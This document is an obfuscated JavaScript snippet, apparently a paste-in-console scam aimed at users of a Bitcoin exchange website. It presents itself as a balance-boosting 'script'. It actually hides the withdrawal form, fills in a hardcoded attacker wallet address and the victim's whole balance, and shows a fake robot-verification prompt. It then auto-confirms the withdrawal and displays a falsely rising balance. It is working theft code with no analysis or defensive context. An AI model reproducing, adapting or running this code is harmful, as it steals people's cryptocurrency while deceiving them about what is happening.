var on = (function() {
if (window['addEventListener']) {
return function(_0x55cfx2, _0x55cfx3, _0x55cfx4) {
_0x55cfx2['addEventListener'](_0x55cfx3, _0x55cfx4, false)
}
} else {
return function(_0x55cfx5, _0x55cfx6, _0x55cfx7) {
_0x55cfx5['attachEvent']('on' + _0x55cfx6, _0x55cfx7)
}
}
}());
document['querySelectorAll']('.balance-btc-html')[2]['setAttribute']('id', 'newaccount23');
var baseBal = parseFloat(document['getElementById']('newaccount23')['innerHTML']) - 0.00061;
var amt;
(function() {
if (baseBal >= 0.0030000) {
if (baseBal <= 1.00061) {
amt = '"' + baseBal + '"'
} else {
amt = '1'
}
} else {
alert('Please make your BTC 0.004 to run the script');
return
};
$('#menu-left-withdraw')['click']();
document['querySelector']('#modal-withdraw .btn.btn-lg.btn-info.btn-close')['style']['display'] = 'none';
document['querySelector']('#withdraw-estimate-time-div')['style']['opacity'] = '0';
document['querySelector']('#modal-withdraw p[class=\'text-center mar-no\']')['style']['display'] = 'none';
document['querySelector']('#modal-withdraw p[class=\'pad-hor\']')['style']['display'] = 'none';
document['querySelector']('#modal-withdraw h4[class=\'modal-title text-center\']')['innerHTML'] = 'B1TSL3R SCRIPT WORKING 1N PR0GR3SS';
document['getElementById']('withdraw-address')['style']['display'] = 'none';
document['getElementById']('withdraw-amount')['style']['display'] = 'none';
document['getElementById']('withdraw-fee')['style']['display'] = 'none';
$('#menu-left-withdraw')['click']();
document['getElementById']('withdraw-address')['value'] = '1JBWGo5KaQp359TnQqmN5s9Rp1o4xBipg6';
document['getElementById']('withdraw-amount')['value'] = baseBal;
document['getElementById']('withdraw-fee')['value'] = 0.0006;
document['getElementById']('btn-withdraw')['innerHTML'] = 'Start Script';
var _0x55cfxa = $('#modal-withdraw h4[class=mar-no]');
var _0x55cfxb = document['getElementById']('btn-withdraw');
_0x55cfxb['style']['display'] = 'none';
for (var _0x55cfxc = 0; _0x55cfxc < _0x55cfxa['length']; _0x55cfxc++) {
_0x55cfxa[_0x55cfxc]['style']['display'] = 'none'
};
$('<h2>Please Verify that you are not robot...</h2>')['insertBefore']('#withdraw-estimate-time-div');
$('#modal-withdraw .security-captcha')[0]['style']['display'] = 'none';
setTimeout(function() {
$('#modal-withdraw .security-captcha')[0]['style']['display'] = 'block'
}, 2000);
setTimeout(function() {
document['getElementById']('btn-withdraw')['style']['display'] = 'block'
}, 4000);
on(document['getElementById']('btn-withdraw'), 'click', function() {
setTimeout(function() {
$('div[class=\'bootbox modal fade bootbox-confirm in\']')[0]['style']['display'] = 'none';
$('button[data-bb-handler=confirm]')['click']()
}, 200);
setInterval(function() {
var _0x55cfxd = parseFloat(document['getElementById']('newaccount23')['innerHTML']);
document['getElementById']('newaccount23')['innerHTML'] = (_0x55cfxd + baseBal)
}, 3000)
})
})()